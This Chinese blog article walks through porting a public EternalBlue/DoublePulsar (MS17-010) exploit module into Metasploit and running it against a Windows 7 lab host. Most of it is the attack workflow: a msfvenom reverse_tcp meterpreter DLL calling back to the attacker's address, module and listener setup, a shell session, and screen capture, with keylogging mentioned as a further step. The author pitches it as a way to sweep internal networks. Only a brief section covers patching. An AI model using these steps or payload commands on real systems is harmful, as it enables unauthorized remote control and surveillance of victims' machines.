内网大杀器!Metasploit移植MS17-010漏洞代码模块利用

简介: 本文讲的是内网大杀器!Metasploit移植MS17-010漏洞代码模块利用,2017年4月,网络最为轰动的事件无疑是TheShadowBrokers放出一大批NSA(美国国家安全局)“方程式组织” (Equation Group)使用的极具破坏力的黑客工具
本文讲的是 内网大杀器!Metasploit移植MS17-010漏洞代码模块利用

0x01 引言 

2017年4月,网络最为轰动的事件无疑是TheShadowBrokers放出一大批NSA(美国国家安全局)“方程式组织” (Equation Group)使用的极具破坏力的黑客工具,其中包括可以远程攻破全球约70%Windows机器的漏洞利用工具。一夜之间,全世界70%的windows服务器置于危险之中,国内使用windows服务器的高校、国企甚至政府机构也不能幸免。这对互联网无疑造成了一次大地震,因为已经很久没有出现过像MS17-010这种级别的漏洞了,因此就被大家笑语说出了“指哪打哪”这样一个事实。

受影响的Windows 版本包括Windows NT、Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8、Windows 2008、Windows 2008 R2、Windows Server 2012 SP0等。

0x02 Eternalblue(MS17-010)漏洞介绍

漏洞原理详见:NSA Eternalblue SMB漏洞分析

0x03  MS17-010漏洞的危害及修复措施

1.升级到微软提供支持的Windows版本,并安装补丁:https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/

2.安装相关的防护措施,如缓冲区溢出防御软件、杀毒软件。

3.无补丁的Windows版本,临时关闭135、137、445端口和3389远程登录。

0x04  移植MS17-010漏洞利用代码模块

Metasploit集合了大量的系统漏洞利用代码,但并不是拥有所有的漏洞代码,所以Metasploit有一个非常强大的功能,它允许使用者开发自己的漏洞模块,MS17-010的漏洞利用模块Metasploit虽然还没有集成,但是网络上已经有相应的渗透模块了,这些模块可能是用各种语言编写的,比如perl、python等,Metasploit支持各种不同语言编写的模块移植到其框架中,通过这种机制可以将各种现存的模块软件移植成为与Metasploit兼容的渗透模块。

当网络上Eternalblue漏洞烽烟四起,血流成河的时候,我在想为啥不把这个东西放到msf里去啊?现在外网服务器大部分都打补丁了,但是内网相对比较薄弱,打补丁的管理员肯定不会太多啊。那特么不就是内网一个大杀器么。正当我在构思代码要怎么撸的时候,瞄到了推特上一条消息。

内网大杀器!Metasploit移植MS17-010漏洞代码模块利用

还说什么,赶紧测试啊

Github:要地址点我

内网大杀器!Metasploit移植MS17-010漏洞代码模块利用

我那个激动啊,还看想毛线啊,赶紧看看人家怎么写的去测试啊!

首先我们把它克隆到我们本地

内网大杀器!Metasploit移植MS17-010漏洞代码模块利用

我们可以在里面修改一下一些默认的配置信息,(图片中标注的是默认文件地址)

内网大杀器!Metasploit移植MS17-010漏洞代码模块利用

修改完成后,我们将他放到metasploit的目录下供我们使用

(你想放哪里放哪里,这些都不重要,只要你记得住)

打开msf并重新加载全部文件

内网大杀器!Metasploit移植MS17-010漏洞代码模块利用

ok,加载完成后我们就可以读取到我们新添加进去的模块了

内网大杀器!Metasploit移植MS17-010漏洞代码模块利用

0x05 Metasploit下MS17-010漏洞提权实战利用

攻击机器kali:192.168.12.110

靶机win7 x32: 192.168.12.108

我们生成一个dll文件,是32位的系统就生成32位的dll,64位的系统就生成64位的系统,根据情况而定。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.12.110 lport=4444 -f dll -o /root/.wine/drive_c/eternal11.dll

打开msf,使用我们自己的模块

use exploit/windows/smb/eternalblue_doublepulsar

设置相关信息

set RHOST 192.168.12.108

我们需要设置payload来监听攻击成功后返回的shell

use exploit/multi/handler
set lhost 192.168.12.110
set lport 4444
set PAYLOAD windows/meterpreter/reverse_tcp
exploit

设置完成后

内网大杀器!Metasploit移植MS17-010漏洞代码模块利用

执行Exploit

内网大杀器!Metasploit移植MS17-010漏洞代码模块利用

我们成功获取到了一个meterpreter会话

看一下对方ip

ifconfig

内网大杀器!Metasploit移植MS17-010漏洞代码模块利用

内网大杀器!Metasploit移植MS17-010漏洞代码模块利用

这个时候,我们就可以干一些坏坏的事情了,比如说看看屏幕、键盘记录等等,我就截取个屏幕吧

screenshot

内网大杀器!Metasploit移植MS17-010漏洞代码模块利用

0x05 总结

这个漏洞刚出来的时候基本上可以通杀百分之七十的外网windows服务器。截止到这会,根据我的内网测试结果,可以通杀百分之九十的Windows内网服务器。




原文发布时间为:2017年5月4日
本文作者:smileTT
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
目录
相关文章
|
Web App开发 安全 Shell
Chrome远程代码执行并移植MSF控制
Chrome远程代码执行并移植MSF控制
Chrome远程代码执行并移植MSF控制
|
监控 算法
Booth算法在局域网监控软件中的运用和具体例子
通过使用Booth算法,局域网监控软件可以更加高效地完成IP地址匹配、范围查询和信息更新等任务,提高软件的性能和效率,从而更好地满足用户的监控和管理需求
286 0
|
网络协议
【BP靶场portswigger-服务端4】操作系统命令注入-5个实验(全)(下)
【BP靶场portswigger-服务端4】操作系统命令注入-5个实验(全)(下)
190 0
【BP靶场portswigger-服务端4】操作系统命令注入-5个实验(全)(下)
|
安全 Shell API
【BP靶场portswigger-服务端4】操作系统命令注入-5个实验(全)(上)
【BP靶场portswigger-服务端4】操作系统命令注入-5个实验(全)(上)
265 0
【BP靶场portswigger-服务端4】操作系统命令注入-5个实验(全)(上)
|
网络协议 测试技术 Windows
loadrunner 场景设计-IP Spoofer-多ip负载生成器(Windows平台)
loadrunner 场景设计-IP Spoofer-多ip负载生成器(Windows平台)
149 0
|
网络协议 测试技术 存储
IPerf——网络测试工具介绍与源码解析(3)
【线程的生成】   生成线程时需要传入一个thread_Settings类型的变量,thread_Settings包含所有线程运行时需要的信息,命令行选项参数解析后所有得到的属性都存储到该类型的变量中,作为线程生成的传入值能够决定当前线程扮演的角色。
805 0
|
网络协议 测试技术 C++
IPerf——网络测试工具介绍与源码解析(1)
IPerf是一个开源的测试网络宽带并能统计并报告延迟抖动、数据包丢失率信息的控制台命令程序,通过参数选项可以方便地看出,通过设置不同的选项值对网络带宽的影响,对于学习网络编程还是有一定的借鉴意义,至少可以玩上一段时间。
1461 0
|
网络协议 测试技术 Windows
IPerf——网络测试工具介绍与源码解析(2)
对于IPerf源码解析,我是基于2.0.5版本在Windows下执行的情况进行分析的,提倡开始先通过对源码的简单修改使其能够在本地编译器运行起来,这样可以打印输出一些中间信息,对于理解源码的逻辑,程序实现的过程能够起到事半功倍的效果。
986 0
|
测试技术 网络协议
IPerf——网络测试工具介绍与源码解析(5)
本篇随笔讲述一下TCP协议下,双向测试模式和交易测试模式下客户端和服务端执行的情况; 双向测试模式: 官方文档的解释 Run Iperf in dual testing mode. This will cause the server to connect back to the client ...
983 0
|
数据安全/隐私保护 Windows 安全